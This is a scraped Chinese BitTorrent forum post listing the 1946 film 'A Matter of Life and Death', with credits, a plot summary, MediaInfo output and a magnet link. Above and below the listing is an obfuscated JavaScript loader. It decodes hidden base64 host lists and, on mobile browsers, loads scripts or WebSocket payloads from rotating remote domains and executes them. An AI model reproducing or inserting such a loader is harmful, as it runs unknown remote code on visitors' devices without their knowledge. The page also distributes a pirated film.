平步青云[中文字幕].A.Matter.of.Life.and.Death.1946.1080p.BluRay.DD2.0.x265-10bit 9.06GB

版主小s 1月前 218

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 平步青云 / 太虛幻境(台) / 生死判决 / 生死攸关 / 生死缘 / Stairway to Heaven

◎片 名 A Matter of Life and Death

◎年 代 1946

◎产 地 英国

◎类 别 剧情 / 爱情 / 战争 / 奇幻

◎语 言 英语 / 法语

◎上映日期 1946-12-25

◎IMDb链接 https://www.imdb.com/title/tt0038733/

◎豆瓣评分 7.7/10 (763人评价)

◎豆瓣链接 https://movie.douban.com/subject/1299411/

◎片 长 104 分钟

◎导 演 迈克尔·鲍威尔 Michael Powell (id:1027955)

埃默里克·普雷斯伯格 Emeric Pressburger (id:1037079)

◎编 剧 迈克尔·鲍威尔 Michael Powell (id:1027955)

埃默里克·普雷斯伯格 Emeric Pressburger (id:1037079)

◎演 员 大卫·尼文 David Niven (id:1032024)

金·亨特 Kim Hunter (id:1041206)

罗伯托·库特 Robert Coote (id:1069577)

凯思琳·拜荣 Kathleen Byron (id:1014300)

理查德·阿滕伯勒 Richard Attenborough (id:1049601)

雷金纳德·米尔斯 Reginald Mills (id:1292130)

◎标 签 英国 / 奇幻 / 1940s / 爱情 / 1946 / 喜剧 / 英国电影 / 迈克尔·鲍威尔

◎简 介

二战时期,英国皇家空军Peter(大卫·尼文 David Niven 饰)驾驶的飞机即将坠毁,他的战友Bob已经死亡。他联系上了美国波士顿的军事电台,向电台的女兵June(金·亨特 Kim Hunter 饰)交代了他的遗言。随后Peter在没有降落伞的情况下跳了机,落在了一个海上,意外活了下来。更在醒来的海滩上遇到了June,两人坠入爱河。而死去的Bob则去了天国,一直等不到Peter。天国派出了71号管理员来人间找回Peter,而Peter则不想死去。为了活下来,他必须在天国打赢一场官司,他可以挑选一名律师,这些律师都是那些死去的人,例如柏拉图、林肯等人,Peter能否赢得这场官司从而留在人间和June长相厮守呢?

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 21326079874878796061790747278659576567 (0x100B40EACC7109CF4F3935C8F5F062F7)

  4. Complete name : A.Ma[email protected]BBQDDQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 9.06 GiB

  8. Duration : 1 h 44 min

  9. Overall bit rate : 12.4 Mb/s

  10. Movie name : A Matter of Life and Death 1946 1080p BluRay DD2.0 [email protected]

  11. Encoded date : UTC 2021-10-15 22:34:39

  12. Writing application : mkvmerge v38.0.0 ('The Silent Type') 64-bit

  13. Writing library : libebml v1.3.9 + libmatroska v1.5.2


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@High

  19. Codec ID : V_MPEGH/ISO/HEVC

  20. Duration : 1 h 44 min

  21. Bit rate : 11.7 Mb/s

  22. Width : 1 476 pixels

  23. Height : 1 080 pixels

  24. Display aspect ratio : 4:3

  25. Frame rate mode : Constant

  26. Frame rate : 23.976 (24000/1001/53354) FPS

  27. Color space : YUV

  28. Chroma subsampling : 4:2:0

  29. Bit depth : 10 bits

  30. Bits/(Pixel*Frame) : 0.307

  31. Stream size : 8.56 GiB (95%)

  32. Title : @HDSky

  33. Writing library : x265 - H.265/HEVC codec

  34. Default : Yes

  35. Forced : No


  36. Audio

  37. ID : 2

  38. Format : AC-3

  39. Format/Info : Audio Coding 3

  40. Commercial name : Dolby Digital

  41. Codec ID : A_AC3

  42. Duration : 1 h 44 min

  43. Bit rate mode : Constant

  44. Bit rate : 640 kb/s

  45. Channel(s) : 1 channel

  46. Channel layout : C

  47. Sampling rate : 48.0 kHz

  48. Frame rate : 31.250 FPS (1536 SPF)

  49. Compression mode : Lossy

  50. Stream size : 478 MiB (5%)

  51. Title : English

  52. Language : English

  53. Service kind : Complete Main

  54. Default : Yes

  55. Forced : No


  56. Text #1

  57. ID : 3

  58. Format : PGS

  59. Muxing mode : zlib

  60. Codec ID : S_HDMV/PGS

  61. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  62. Duration : 1 h 42 min

  63. Bit rate : 37.2 kb/s

  64. Count of elements : 2832

  65. Stream size : 27.4 MiB (0%)

  66. Title : CHS

  67. Language : Chinese

  68. Default : Yes

  69. Forced : No


  70. Text #2

  71. ID : 4

  72. Format : PGS

  73. Muxing mode : zlib

  74. Codec ID : S_HDMV/PGS

  75. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  76. Duration : 1 h 42 min

  77. Bit rate : 37.2 kb/s

  78. Count of elements : 2832

  79. Stream size : 27.4 MiB (0%)

  80. Title : CHT

  81. Language : Chinese

  82. Default : No

  83. Forced : No


  84. Menu

  85. 00:00:00.000 : en:Chapter 01

  86. 00:05:14.314 : en:Chapter 02

  87. 00:16:51.552 : en:Chapter 03

  88. 00:22:20.172 : en:Chapter 04

  89. 00:33:47.359 : en:Chapter 05

  90. 00:46:17.900 : en:Chapter 06

  91. 00:56:55.787 : en:Chapter 07

  92. 01:05:56.119 : en:Chapter 08

  93. 01:16:52.900 : en:Chapter 09

  94. 01:26:05.285 : en:Chapter 10

  95. 01:34:39.048 : en:Chapter 11




复制代码


TAGS 奇幻 剧情 爱情 战争

磁力链:
  • magnet:?xt=urn:btih:912C812F45194C8B83FE25A90C0E384A818EE902

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};